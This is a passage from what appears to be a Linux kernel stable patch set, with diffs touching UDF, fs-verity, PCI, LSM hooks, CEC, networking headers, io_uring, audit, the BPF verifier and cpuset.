++					      laarr[i].extLength);
++			/*
++			 * If we fail here, we are likely corrupting the extent
++			 * list and leaking blocks. At least stop early to
++			 * limit the damage.
++			 */
++			if (err < 0)
++				return err;
+ 			udf_next_aext(inode, epos, &laarr[i].extLocation,
+ 				      &laarr[i].extLength, 1);
+ 			start++;
+@@ -1182,6 +1191,7 @@ static void udf_update_extents(struct inode *inode, struct kernel_long_ad *laarr
+ 		udf_write_aext(inode, epos, &laarr[i].extLocation,
+ 			       laarr[i].extLength, 1);
+ 	}
++	return 0;
+ }
+ 
+ struct buffer_head *udf_bread(struct inode *inode, udf_pblk_t block,
+@@ -2210,12 +2220,13 @@ int8_t udf_current_aext(struct inode *inode, struct extent_position *epos,
+ 	return etype;
+ }
+ 
+-static int8_t udf_insert_aext(struct inode *inode, struct extent_position epos,
+-			      struct kernel_lb_addr neloc, uint32_t nelen)
++static int udf_insert_aext(struct inode *inode, struct extent_position epos,
++			   struct kernel_lb_addr neloc, uint32_t nelen)
+ {
+ 	struct kernel_lb_addr oeloc;
+ 	uint32_t oelen;
+ 	int8_t etype;
++	int err;
+ 
+ 	if (epos.bh)
+ 		get_bh(epos.bh);
+@@ -2225,10 +2236,10 @@ static int8_t udf_insert_aext(struct inode *inode, struct extent_position epos,
+ 		neloc = oeloc;
+ 		nelen = (etype << 30) | oelen;
+ 	}
+-	udf_add_aext(inode, &epos, &neloc, nelen, 1);
++	err = udf_add_aext(inode, &epos, &neloc, nelen, 1);
+ 	brelse(epos.bh);
+ 
+-	return (nelen >> 30);
++	return err;
+ }
+ 
+ int8_t udf_delete_aext(struct inode *inode, struct extent_position epos)
+diff --git a/fs/verity/signature.c b/fs/verity/signature.c
+index 143a530a80088..b59de03055e1e 100644
+--- a/fs/verity/signature.c
++++ b/fs/verity/signature.c
+@@ -54,6 +54,22 @@ int fsverity_verify_signature(const struct fsverity_info *vi,
+ 		return 0;
+ 	}
+ 
++	if (fsverity_keyring->keys.nr_leaves_on_tree == 0) {
++		/*
++		 * The ".fs-verity" keyring is empty, due to builtin signatures
++		 * being supported by the kernel but not actually being used.
++		 * In this case, verify_pkcs7_signature() would always return an
++		 * error, usually ENOKEY.  It could also be EBADMSG if the
++		 * PKCS#7 is malformed, but that isn't very important to
++		 * distinguish.  So, just skip to ENOKEY to avoid the attack
++		 * surface of the PKCS#7 parser, which would otherwise be
++		 * reachable by any task able to execute FS_IOC_ENABLE_VERITY.
++		 */
++		fsverity_err(inode,
++			     "fs-verity keyring is empty, rejecting signed file!");
++		return -ENOKEY;
++	}
++
+ 	d = kzalloc(sizeof(*d) + hash_alg->digest_size, GFP_KERNEL);
+ 	if (!d)
+ 		return -ENOMEM;
+diff --git a/include/crypto/algapi.h b/include/crypto/algapi.h
+index 224b860647083..939a3196bf002 100644
+--- a/include/crypto/algapi.h
++++ b/include/crypto/algapi.h
+@@ -12,6 +12,7 @@
+ #include <linux/kconfig.h>
+ #include <linux/list.h>
+ #include <linux/types.h>
++#include <linux/workqueue.h>
+ 
+ #include <asm/unaligned.h>
+ 
+@@ -60,6 +61,8 @@ struct crypto_instance {
+ 		struct crypto_spawn *spawns;
+ 	};
+ 
++	struct work_struct free_work;
++
+ 	void *__ctx[] CRYPTO_MINALIGN_ATTR;
+ };
+ 
+diff --git a/include/dt-bindings/clock/qcom,gcc-sc8280xp.h b/include/dt-bindings/clock/qcom,gcc-sc8280xp.h
+index cb2fb638825ca..8454915917849 100644
+--- a/include/dt-bindings/clock/qcom,gcc-sc8280xp.h
++++ b/include/dt-bindings/clock/qcom,gcc-sc8280xp.h
+@@ -492,5 +492,17 @@
+ #define USB30_MP_GDSC					9
+ #define USB30_PRIM_GDSC					10
+ #define USB30_SEC_GDSC					11
++#define EMAC_0_GDSC					12
++#define EMAC_1_GDSC					13
++#define USB4_1_GDSC					14
++#define USB4_GDSC					15
++#define HLOS1_VOTE_MMNOC_MMU_TBU_HF0_GDSC		16
++#define HLOS1_VOTE_MMNOC_MMU_TBU_HF1_GDSC		17
++#define HLOS1_VOTE_MMNOC_MMU_TBU_SF0_GDSC		18
++#define HLOS1_VOTE_MMNOC_MMU_TBU_SF1_GDSC		19
++#define HLOS1_VOTE_TURING_MMU_TBU0_GDSC			20
++#define HLOS1_VOTE_TURING_MMU_TBU1_GDSC			21
++#define HLOS1_VOTE_TURING_MMU_TBU2_GDSC			22
++#define HLOS1_VOTE_TURING_MMU_TBU3_GDSC			23
+ 
+ #endif
+diff --git a/include/linux/arm_sdei.h b/include/linux/arm_sdei.h
+index 14dc461b0e829..255701e1251b4 100644
+--- a/include/linux/arm_sdei.h
++++ b/include/linux/arm_sdei.h
+@@ -47,10 +47,12 @@ int sdei_unregister_ghes(struct ghes *ghes);
+ int sdei_mask_local_cpu(void);
+ int sdei_unmask_local_cpu(void);
+ void __init sdei_init(void);
++void sdei_handler_abort(void);
+ #else
+ static inline int sdei_mask_local_cpu(void) { return 0; }
+ static inline int sdei_unmask_local_cpu(void) { return 0; }
+ static inline void sdei_init(void) { }
++static inline void sdei_handler_abort(void) { }
+ #endif /* CONFIG_ARM_SDE_INTERFACE */
+ 
+ 
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 427e79ac72194..57674b3c58774 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -565,6 +565,7 @@ struct request_queue {
+ #define QUEUE_FLAG_NOXMERGES	9	/* No extended merges */
+ #define QUEUE_FLAG_ADD_RANDOM	10	/* Contributes to random pool */
+ #define QUEUE_FLAG_SAME_FORCE	12	/* force complete on same CPU */
++#define QUEUE_FLAG_HW_WC	18	/* Write back caching supported */
+ #define QUEUE_FLAG_INIT_DONE	14	/* queue is initialized */
+ #define QUEUE_FLAG_STABLE_WRITES 15	/* don't modify blks until WB is done */
+ #define QUEUE_FLAG_POLL		16	/* IO polling enabled if set */
+diff --git a/include/linux/clk-provider.h b/include/linux/clk-provider.h
+index 267cd06b54a01..aefb06373720f 100644
+--- a/include/linux/clk-provider.h
++++ b/include/linux/clk-provider.h
+@@ -1361,7 +1361,13 @@ struct clk_hw_onecell_data {
+ 	struct clk_hw *hws[];
+ };
+ 
+-#define CLK_OF_DECLARE(name, compat, fn) OF_DECLARE_1(clk, name, compat, fn)
++#define CLK_OF_DECLARE(name, compat, fn) \
++	static void __init __##name##_of_clk_init_declare(struct device_node *np) \
++	{								\
++		fn(np);							\
++		fwnode_dev_initialized(of_fwnode_handle(np), true);	\
++	}								\
++	OF_DECLARE_1(clk, name, compat, __##name##_of_clk_init_declare)
+ 
+ /*
+  * Use this macro when you have a driver that requires two initialization
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 0a1ccc68e798a..784dd6b6046eb 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -357,6 +357,7 @@ struct hid_item {
+ #define HID_QUIRK_NO_OUTPUT_REPORTS_ON_INTR_EP	BIT(18)
+ #define HID_QUIRK_HAVE_SPECIAL_DRIVER		BIT(19)
+ #define HID_QUIRK_INCREMENT_USAGE_ON_DUPLICATE	BIT(20)
++#define HID_QUIRK_NOINVERT			BIT(21)
+ #define HID_QUIRK_FULLSPEED_INTERVAL		BIT(28)
+ #define HID_QUIRK_NO_INIT_REPORTS		BIT(29)
+ #define HID_QUIRK_NO_IGNORE			BIT(30)
+diff --git a/include/linux/if_arp.h b/include/linux/if_arp.h
+index 1ed52441972f9..10a1e81434cb9 100644
+--- a/include/linux/if_arp.h
++++ b/include/linux/if_arp.h
+@@ -53,6 +53,10 @@ static inline bool dev_is_mac_header_xmit(const struct net_device *dev)
+ 	case ARPHRD_NONE:
+ 	case ARPHRD_RAWIP:
+ 	case ARPHRD_PIMREG:
++	/* PPP adds its l2 header automatically in ppp_start_xmit().
++	 * This makes it look like an l3 device to __bpf_redirect() and tcf_mirred_init().
++	 */
++	case ARPHRD_PPP:
+ 		return false;
+ 	default:
+ 		return true;
+diff --git a/include/linux/ioport.h b/include/linux/ioport.h
+index 27642ca15d932..4ae3c541ea6f4 100644
+--- a/include/linux/ioport.h
++++ b/include/linux/ioport.h
+@@ -318,6 +318,8 @@ extern void __devm_release_region(struct device *dev, struct resource *parent,
+ 				  resource_size_t start, resource_size_t n);
+ extern int iomem_map_sanity_check(resource_size_t addr, unsigned long size);
+ extern bool iomem_is_exclusive(u64 addr);
++extern bool resource_is_exclusive(struct resource *resource, u64 addr,
++				  resource_size_t size);
+ 
+ extern int
+ walk_system_ram_range(unsigned long start_pfn, unsigned long nr_pages,
+diff --git a/include/linux/kernfs.h b/include/linux/kernfs.h
+index 73f5c120def88..2a36f3218b510 100644
+--- a/include/linux/kernfs.h
++++ b/include/linux/kernfs.h
+@@ -550,6 +550,10 @@ static inline int kernfs_setattr(struct kernfs_node *kn,
+ 				 const struct iattr *iattr)
+ { return -ENOSYS; }
+ 
++static inline __poll_t kernfs_generic_poll(struct kernfs_open_file *of,
++					   struct poll_table_struct *pt)
++{ return -ENOSYS; }
++
+ static inline void kernfs_notify(struct kernfs_node *kn) { }
+ 
+ static inline int kernfs_xattr_get(struct kernfs_node *kn, const char *name,
+diff --git a/include/linux/lsm_hook_defs.h b/include/linux/lsm_hook_defs.h
+index ec119da1d89b4..4a97a6db9bcec 100644
+--- a/include/linux/lsm_hook_defs.h
++++ b/include/linux/lsm_hook_defs.h
+@@ -54,6 +54,7 @@ LSM_HOOK(int, 0, bprm_creds_from_file, struct linux_binprm *bprm, struct file *f
+ LSM_HOOK(int, 0, bprm_check_security, struct linux_binprm *bprm)
+ LSM_HOOK(void, LSM_RET_VOID, bprm_committing_creds, struct linux_binprm *bprm)
+ LSM_HOOK(void, LSM_RET_VOID, bprm_committed_creds, struct linux_binprm *bprm)
++LSM_HOOK(int, 0, fs_context_submount, struct fs_context *fc, struct super_block *reference)
+ LSM_HOOK(int, 0, fs_context_dup, struct fs_context *fc,
+ 	 struct fs_context *src_sc)
+ LSM_HOOK(int, -ENOPARAM, fs_context_parse_param, struct fs_context *fc,
+diff --git a/include/linux/memcontrol.h b/include/linux/memcontrol.h
+index e039763029563..099521835cd14 100644
+--- a/include/linux/memcontrol.h
++++ b/include/linux/memcontrol.h
+@@ -283,6 +283,11 @@ struct mem_cgroup {
+ 	atomic_long_t		memory_events[MEMCG_NR_MEMORY_EVENTS];
+ 	atomic_long_t		memory_events_local[MEMCG_NR_MEMORY_EVENTS];
+ 
++	/*
++	 * Hint of reclaim pressure for socket memory management. Note
++	 * that this indicator should NOT be used in legacy cgroup mode
++	 * where socket memory is accounted/charged separately.
++	 */
+ 	unsigned long		socket_pressure;
+ 
+ 	/* Legacy tcp memory accounting */
+@@ -1704,8 +1709,8 @@ void mem_cgroup_sk_alloc(struct sock *sk);
+ void mem_cgroup_sk_free(struct sock *sk);
+ static inline bool mem_cgroup_under_socket_pressure(struct mem_cgroup *memcg)
+ {
+-	if (!cgroup_subsys_on_dfl(memory_cgrp_subsys) && memcg->tcpmem_pressure)
+-		return true;
++	if (!cgroup_subsys_on_dfl(memory_cgrp_subsys))
++		return !!memcg->tcpmem_pressure;
+ 	do {
+ 		if (time_before(jiffies, READ_ONCE(memcg->socket_pressure)))
+ 			return true;
+diff --git a/include/linux/nfs_xdr.h b/include/linux/nfs_xdr.h
+index e86cf6642d212..2fd973d188c47 100644
+--- a/include/linux/nfs_xdr.h
++++ b/include/linux/nfs_xdr.h
+@@ -670,6 +670,7 @@ struct nfs_pgio_res {
+ 		struct {
+ 			unsigned int		replen;		/* used by read */
+ 			int			eof;		/* used by read */
++			void *			scratch;	/* used by read */
+ 		};
+ 		struct {
+ 			struct nfs_writeverf *	verf;		/* used by write */
+diff --git a/include/linux/nls.h b/include/linux/nls.h
+index 499e486b3722d..e0bf8367b274a 100644
+--- a/include/linux/nls.h
++++ b/include/linux/nls.h
+@@ -47,7 +47,7 @@ enum utf16_endian {
+ /* nls_base.c */
+ extern int __register_nls(struct nls_table *, struct module *);
+ extern int unregister_nls(struct nls_table *);
+-extern struct nls_table *load_nls(char *);
++extern struct nls_table *load_nls(const char *charset);
+ extern void unload_nls(struct nls_table *);
+ extern struct nls_table *load_nls_default(void);
+ #define register_nls(nls) __register_nls((nls), THIS_MODULE)
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index 9f617ffdb863f..eccaf1abea79d 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -409,6 +409,7 @@ struct pci_dev {
+ 	 */
+ 	unsigned int	irq;
+ 	struct resource resource[DEVICE_COUNT_RESOURCE]; /* I/O and memory regions + expansion ROMs */
++	struct resource driver_exclusive_resource;	 /* driver exclusive resource ranges */
+ 
+ 	bool		match_driver;		/* Skip attaching driver */
+ 
+@@ -465,6 +466,7 @@ struct pci_dev {
+ 	pci_dev_flags_t dev_flags;
+ 	atomic_t	enable_cnt;	/* pci_enable_device has been called */
+ 
++	spinlock_t	pcie_cap_lock;		/* Protects RMW ops in capability accessors */
+ 	u32		saved_config_space[16]; /* Config space saved at suspend time */
+ 	struct hlist_head saved_cap_space;
+ 	int		rom_attr_enabled;	/* Display of ROM attribute enabled? */
+@@ -1208,11 +1210,40 @@ int pcie_capability_read_word(struct pci_dev *dev, int pos, u16 *val);
+ int pcie_capability_read_dword(struct pci_dev *dev, int pos, u32 *val);
+ int pcie_capability_write_word(struct pci_dev *dev, int pos, u16 val);
+ int pcie_capability_write_dword(struct pci_dev *dev, int pos, u32 val);
+-int pcie_capability_clear_and_set_word(struct pci_dev *dev, int pos,
+-				       u16 clear, u16 set);
++int pcie_capability_clear_and_set_word_unlocked(struct pci_dev *dev, int pos,
++						u16 clear, u16 set);
++int pcie_capability_clear_and_set_word_locked(struct pci_dev *dev, int pos,
++					      u16 clear, u16 set);
+ int pcie_capability_clear_and_set_dword(struct pci_dev *dev, int pos,
+ 					u32 clear, u32 set);
+ 
++/**
++ * pcie_capability_clear_and_set_word - RMW accessor for PCI Express Capability Registers
++ * @dev:	PCI device structure of the PCI Express device
++ * @pos:	PCI Express Capability Register
++ * @clear:	Clear bitmask
++ * @set:	Set bitmask
++ *
++ * Perform a Read-Modify-Write (RMW) operation using @clear and @set
++ * bitmasks on PCI Express Capability Register at @pos. Certain PCI Express
++ * Capability Registers are accessed concurrently in RMW fashion, hence
++ * require locking which is handled transparently to the caller.
++ */
++static inline int pcie_capability_clear_and_set_word(struct pci_dev *dev,
++						     int pos,
++						     u16 clear, u16 set)
++{
++	switch (pos) {
++	case PCI_EXP_LNKCTL:
++	case PCI_EXP_RTCTL:
++		return pcie_capability_clear_and_set_word_locked(dev, pos,
++								 clear, set);
++	default:
++		return pcie_capability_clear_and_set_word_unlocked(dev, pos,
++								   clear, set);
++	}
++}
++
+ static inline int pcie_capability_set_word(struct pci_dev *dev, int pos,
+ 					   u16 set)
+ {
+@@ -1408,6 +1439,21 @@ int pci_request_selected_regions(struct pci_dev *, int, const char *);
+ int pci_request_selected_regions_exclusive(struct pci_dev *, int, const char *);
+ void pci_release_selected_regions(struct pci_dev *, int);
+ 
++static inline __must_check struct resource *
++pci_request_config_region_exclusive(struct pci_dev *pdev, unsigned int offset,
++				    unsigned int len, const char *name)
++{
++	return __request_region(&pdev->driver_exclusive_resource, offset, len,
++				name, IORESOURCE_EXCLUSIVE);
++}
++
++static inline void pci_release_config_region(struct pci_dev *pdev,
++					     unsigned int offset,
++					     unsigned int len)
++{
++	__release_region(&pdev->driver_exclusive_resource, offset, len);
++}
++
+ /* drivers/pci/bus.c */
+ void pci_add_resource(struct list_head *resources, struct resource *res);
+ void pci_add_resource_offset(struct list_head *resources, struct resource *res,
+@@ -2487,6 +2533,7 @@ void pci_uevent_ers(struct pci_dev *pdev, enum  pci_ers_result err_type);
+ #define pci_crit(pdev, fmt, arg...)	dev_crit(&(pdev)->dev, fmt, ##arg)
+ #define pci_err(pdev, fmt, arg...)	dev_err(&(pdev)->dev, fmt, ##arg)
+ #define pci_warn(pdev, fmt, arg...)	dev_warn(&(pdev)->dev, fmt, ##arg)
++#define pci_warn_once(pdev, fmt, arg...) dev_warn_once(&(pdev)->dev, fmt, ##arg)
+ #define pci_notice(pdev, fmt, arg...)	dev_notice(&(pdev)->dev, fmt, ##arg)
+ #define pci_info(pdev, fmt, arg...)	dev_info(&(pdev)->dev, fmt, ##arg)
+ #define pci_dbg(pdev, fmt, arg...)	dev_dbg(&(pdev)->dev, fmt, ##arg)
+diff --git a/include/linux/security.h b/include/linux/security.h
+index ca1b7109c0dbb..a6c97cc57caa0 100644
+--- a/include/linux/security.h
++++ b/include/linux/security.h
+@@ -293,6 +293,7 @@ int security_bprm_creds_from_file(struct linux_binprm *bprm, struct file *file);
+ int security_bprm_check(struct linux_binprm *bprm);
+ void security_bprm_committing_creds(struct linux_binprm *bprm);
+ void security_bprm_committed_creds(struct linux_binprm *bprm);
++int security_fs_context_submount(struct fs_context *fc, struct super_block *reference);
+ int security_fs_context_dup(struct fs_context *fc, struct fs_context *src_fc);
+ int security_fs_context_parse_param(struct fs_context *fc, struct fs_parameter *param);
+ int security_sb_alloc(struct super_block *sb);
+@@ -625,6 +626,11 @@ static inline void security_bprm_committed_creds(struct linux_binprm *bprm)
+ {
+ }
+ 
++static inline int security_fs_context_submount(struct fs_context *fc,
++					   struct super_block *reference)
++{
++	return 0;
++}
+ static inline int security_fs_context_dup(struct fs_context *fc,
+ 					  struct fs_context *src_fc)
+ {
+diff --git a/include/linux/trace_events.h b/include/linux/trace_events.h
+index 04c59f8d801f1..422f4ca656cf9 100644
+--- a/include/linux/trace_events.h
++++ b/include/linux/trace_events.h
+@@ -863,7 +863,8 @@ extern int  perf_uprobe_init(struct perf_event *event,
+ extern void perf_uprobe_destroy(struct perf_event *event);
+ extern int bpf_get_uprobe_info(const struct perf_event *event,
+ 			       u32 *fd_type, const char **filename,
+-			       u64 *probe_offset, bool perf_type_tracepoint);
++			       u64 *probe_offset, u64 *probe_addr,
++			       bool perf_type_tracepoint);
+ #endif
+ extern int  ftrace_profile_set_filter(struct perf_event *event, int event_id,
+ 				     char *filter_str);
+diff --git a/include/linux/usb/typec_altmode.h b/include/linux/usb/typec_altmode.h
+index 350d49012659b..28aeef8f9e7b5 100644
+--- a/include/linux/usb/typec_altmode.h
++++ b/include/linux/usb/typec_altmode.h
+@@ -67,7 +67,7 @@ struct typec_altmode_ops {
+ 
+ int typec_altmode_enter(struct typec_altmode *altmode, u32 *vdo);
+ int typec_altmode_exit(struct typec_altmode *altmode);
+-void typec_altmode_attention(struct typec_altmode *altmode, u32 vdo);
++int typec_altmode_attention(struct typec_altmode *altmode, u32 vdo);
+ int typec_altmode_vdm(struct typec_altmode *altmode,
+ 		      const u32 header, const u32 *vdo, int count);
+ int typec_altmode_notify(struct typec_altmode *altmode, unsigned long conf,
+diff --git a/include/media/cec.h b/include/media/cec.h
+index abee41ae02d0e..9c007f83569aa 100644
+--- a/include/media/cec.h
++++ b/include/media/cec.h
+@@ -113,22 +113,25 @@ struct cec_fh {
+ #define CEC_FREE_TIME_TO_USEC(ft)		((ft) * 2400)
+ 
+ struct cec_adap_ops {
+-	/* Low-level callbacks */
++	/* Low-level callbacks, called with adap->lock held */
+ 	int (*adap_enable)(struct cec_adapter *adap, bool enable);
+ 	int (*adap_monitor_all_enable)(struct cec_adapter *adap, bool enable);
+ 	int (*adap_monitor_pin_enable)(struct cec_adapter *adap, bool enable);
+ 	int (*adap_log_addr)(struct cec_adapter *adap, u8 logical_addr);
+-	void (*adap_configured)(struct cec_adapter *adap, bool configured);
++	void (*adap_unconfigured)(struct cec_adapter *adap);
+ 	int (*adap_transmit)(struct cec_adapter *adap, u8 attempts,
+ 			     u32 signal_free_time, struct cec_msg *msg);
++	void (*adap_nb_transmit_canceled)(struct cec_adapter *adap,
++					  const struct cec_msg *msg);
+ 	void (*adap_status)(struct cec_adapter *adap, struct seq_file *file);
+ 	void (*adap_free)(struct cec_adapter *adap);
+ 
+-	/* Error injection callbacks */
++	/* Error injection callbacks, called without adap->lock held */
+ 	int (*error_inj_show)(struct cec_adapter *adap, struct seq_file *sf);
+ 	bool (*error_inj_parse_line)(struct cec_adapter *adap, char *line);
+ 
+-	/* High-level CEC message callback */
++	/* High-level CEC message callback, called without adap->lock held */
++	void (*configured)(struct cec_adapter *adap);
+ 	int (*received)(struct cec_adapter *adap, struct cec_msg *msg);
+ };
+ 
+diff --git a/include/net/lwtunnel.h b/include/net/lwtunnel.h
+index 6f15e6fa154e6..53bd2d02a4f0d 100644
+--- a/include/net/lwtunnel.h
++++ b/include/net/lwtunnel.h
+@@ -16,9 +16,12 @@
+ #define LWTUNNEL_STATE_INPUT_REDIRECT	BIT(1)
+ #define LWTUNNEL_STATE_XMIT_REDIRECT	BIT(2)
+ 
++/* LWTUNNEL_XMIT_CONTINUE should be distinguishable from dst_output return
++ * values (NET_XMIT_xxx and NETDEV_TX_xxx in linux/netdevice.h) for safety.
++ */
+ enum {
+ 	LWTUNNEL_XMIT_DONE,
+-	LWTUNNEL_XMIT_CONTINUE,
++	LWTUNNEL_XMIT_CONTINUE = 0x100,
+ };
+ 
+ 
+diff --git a/include/net/mac80211.h b/include/net/mac80211.h
+index 8a338c33118f9..43173204d6d5e 100644
+--- a/include/net/mac80211.h
++++ b/include/net/mac80211.h
+@@ -1141,9 +1141,11 @@ struct ieee80211_tx_info {
+ 			u8 ampdu_ack_len;
+ 			u8 ampdu_len;
+ 			u8 antenna;
++			u8 pad;
+ 			u16 tx_time;
+ 			u8 flags;
+-			void *status_driver_data[18 / sizeof(void *)];
++			u8 pad2;
++			void *status_driver_data[16 / sizeof(void *)];
+ 		} status;
+ 		struct {
+ 			struct ieee80211_tx_rate driver_rates[
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index e9c8f88f47696..5fd69f2342a44 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -355,7 +355,6 @@ ssize_t tcp_splice_read(struct socket *sk, loff_t *ppos,
+ struct sk_buff *tcp_stream_alloc_skb(struct sock *sk, int size, gfp_t gfp,
+ 				     bool force_schedule);
+ 
+-void tcp_enter_quickack_mode(struct sock *sk, unsigned int max_quickacks);
+ static inline void tcp_dec_quickack_mode(struct sock *sk,
+ 					 const unsigned int pkts)
+ {
+diff --git a/include/scsi/scsi_host.h b/include/scsi/scsi_host.h
+index fcf25f1642a3a..d27d9fb7174c8 100644
+--- a/include/scsi/scsi_host.h
++++ b/include/scsi/scsi_host.h
+@@ -757,7 +757,7 @@ extern void scsi_remove_host(struct Scsi_Host *);
+ extern struct Scsi_Host *scsi_host_get(struct Scsi_Host *);
+ extern int scsi_host_busy(struct Scsi_Host *shost);
+ extern void scsi_host_put(struct Scsi_Host *t);
+-extern struct Scsi_Host *scsi_host_lookup(unsigned short);
++extern struct Scsi_Host *scsi_host_lookup(unsigned int hostnum);
+ extern const char *scsi_host_state_name(enum scsi_host_state);
+ extern void scsi_host_complete_all_commands(struct Scsi_Host *shost,
+ 					    enum scsi_host_status status);
+diff --git a/include/uapi/linux/sync_file.h b/include/uapi/linux/sync_file.h
+index ee2dcfb3d6602..d7f7c04a6e0c1 100644
+--- a/include/uapi/linux/sync_file.h
++++ b/include/uapi/linux/sync_file.h
+@@ -52,7 +52,7 @@ struct sync_fence_info {
+  * @name:	name of fence
+  * @status:	status of fence. 1: signaled 0:active <0:error
+  * @flags:	sync_file_info flags
+- * @num_fences	number of fences in the sync_file
++ * @num_fences:	number of fences in the sync_file
+  * @pad:	padding for 64-bit alignment, should always be zero
+  * @sync_fence_info: pointer to array of structs sync_fence_info with all
+  *		 fences in the sync_file
+diff --git a/include/uapi/linux/v4l2-controls.h b/include/uapi/linux/v4l2-controls.h
+index b5e7d082b8adf..d4a4e3cab3c2a 100644
+--- a/include/uapi/linux/v4l2-controls.h
++++ b/include/uapi/linux/v4l2-controls.h
+@@ -2411,6 +2411,9 @@ struct v4l2_ctrl_hevc_slice_params {
+  * @poc_st_curr_after: provides the index of the short term after references
+  *		       in DPB array
+  * @poc_lt_curr: provides the index of the long term references in DPB array
++ * @num_delta_pocs_of_ref_rps_idx: same as the derived value NumDeltaPocs[RefRpsIdx],
++ *				   can be used to parse the RPS data in slice headers
++ *				   instead of skipping it with @short_term_ref_pic_set_size.
+  * @reserved: padding field. Should be zeroed by applications.
+  * @dpb: the decoded picture buffer, for meta-data about reference frames
+  * @flags: see V4L2_HEVC_DECODE_PARAM_FLAG_{}
+@@ -2426,7 +2429,8 @@ struct v4l2_ctrl_hevc_decode_params {
+ 	__u8	poc_st_curr_before[V4L2_HEVC_DPB_ENTRIES_NUM_MAX];
+ 	__u8	poc_st_curr_after[V4L2_HEVC_DPB_ENTRIES_NUM_MAX];
+ 	__u8	poc_lt_curr[V4L2_HEVC_DPB_ENTRIES_NUM_MAX];
+-	__u8	reserved[4];
++	__u8	num_delta_pocs_of_ref_rps_idx;
++	__u8	reserved[3];
+ 	struct	v4l2_hevc_dpb_entry dpb[V4L2_HEVC_DPB_ENTRIES_NUM_MAX];
+ 	__u64	flags;
+ };
+diff --git a/init/Kconfig b/init/Kconfig
+index 2028ed4d50f5b..de255842f5d09 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -627,6 +627,7 @@ config TASK_IO_ACCOUNTING
+ 
+ config PSI
+ 	bool "Pressure stall information tracking"
++	select KERNFS
+ 	help
+ 	  Collect metrics that indicate how overcommitted the CPU, memory,
+ 	  and IO capacity are in the system.
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index b0e47fe1eb4bb..6d455e2428b90 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1457,6 +1457,9 @@ static int io_iopoll_check(struct io_ring_ctx *ctx, long min)
+ 			break;
+ 		nr_events += ret;
+ 		ret = 0;
++
++		if (task_sigpending(current))
++			return -EINTR;
+ 	} while (nr_events < min && !need_resched());
+ 
+ 	return ret;
+@@ -2240,7 +2243,9 @@ static const struct io_uring_sqe *io_get_sqe(struct io_ring_ctx *ctx)
+ 	}
+ 
+ 	/* drop invalid entries */
++	spin_lock(&ctx->completion_lock);
+ 	ctx->cq_extra--;
++	spin_unlock(&ctx->completion_lock);
+ 	WRITE_ONCE(ctx->rings->sq_dropped,
+ 		   READ_ONCE(ctx->rings->sq_dropped) + 1);
+ 	return NULL;
+diff --git a/kernel/auditsc.c b/kernel/auditsc.c
+index 9f8c05228d6d6..a2240f54fc224 100644
+--- a/kernel/auditsc.c
++++ b/kernel/auditsc.c
+@@ -2456,6 +2456,8 @@ void __audit_inode_child(struct inode *parent,
+ 		}
+ 	}
+ 
++	cond_resched();
++
+ 	/* is there a matching child entry? */
+ 	list_for_each_entry(n, &context->names_list, list) {
+ 		/* can only match entries that have a name */
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index fb78bb26786fc..7582ec4fd4131 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -5788,7 +5788,7 @@ error:
+ 		 * that also allows using an array of int as a scratch
+ 		 * space. e.g. skb->cb[].
+ 		 */
+-		if (off + size > mtrue_end) {
++		if (off + size > mtrue_end && !(*flag & PTR_UNTRUSTED)) {
+ 			bpf_log(log,
+ 				"access beyond the end of member %s (mend:%u) in struct %s with off %u size %u\n",
+ 				mname, mtrue_end, tname, off, size);
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 3c414e0ac819e..3052680201e57 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -10401,6 +10401,12 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
+ 		return -EINVAL;
+ 	}
+ 
++	/* check src2 operand */
++	err = check_reg_arg(env, insn->dst_reg, SRC_OP);
++	if (err)
++		return err;
++
++	dst_reg = &regs[insn->dst_reg];
+ 	if (BPF_SRC(insn->code) == BPF_X) {
+ 		if (insn->imm != 0) {
+ 			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
+@@ -10412,12 +10418,13 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
+ 		if (err)
+ 			return err;
+ 
+-		if (is_pointer_value(env, insn->src_reg)) {
++		src_reg = &regs[insn->src_reg];
++		if (!(reg_is_pkt_pointer_any(dst_reg) && reg_is_pkt_pointer_any(src_reg)) &&
++		    is_pointer_value(env, insn->src_reg)) {
+ 			verbose(env, "R%d pointer comparison prohibited\n",
+ 				insn->src_reg);
+ 			return -EACCES;
+ 		}
+-		src_reg = &regs[insn->src_reg];
+ 	} else {
+ 		if (insn->src_reg != BPF_REG_0) {
+ 			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
+@@ -10425,12 +10432,6 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
+ 		}
+ 	}
+ 
+-	/* check src2 operand */
+-	err = check_reg_arg(env, insn->dst_reg, SRC_OP);
+-	if (err)
+-		return err;
+-
+-	dst_reg = &regs[insn->dst_reg];
+ 	is_jmp32 = BPF_CLASS(insn->code) == BPF_JMP32;
+ 
+ 	if (BPF_SRC(insn->code) == BPF_K) {
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index db3e05b6b4dd2..79e6a5d4c29a1 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -1606,11 +1606,16 @@ static void update_cpumasks_hier(struct cpuset *cs, struct tmpmasks *tmp,
+ 		}
+ 
+ 		/*
+-		 * Skip the whole subtree if the cpumask remains the same
+-		 * and has no partition root state and force flag not set.
++		 * Skip the whole subtree if
++		 * 1) the cpumask remains the same,
++		 * 2) has no partition root state,
++		 * 3) force flag not set, and
++		 * 4) for v2 load balance state same as its parent.
+ 		 */
+ 		if (!cp->partition_root_state && !force &&
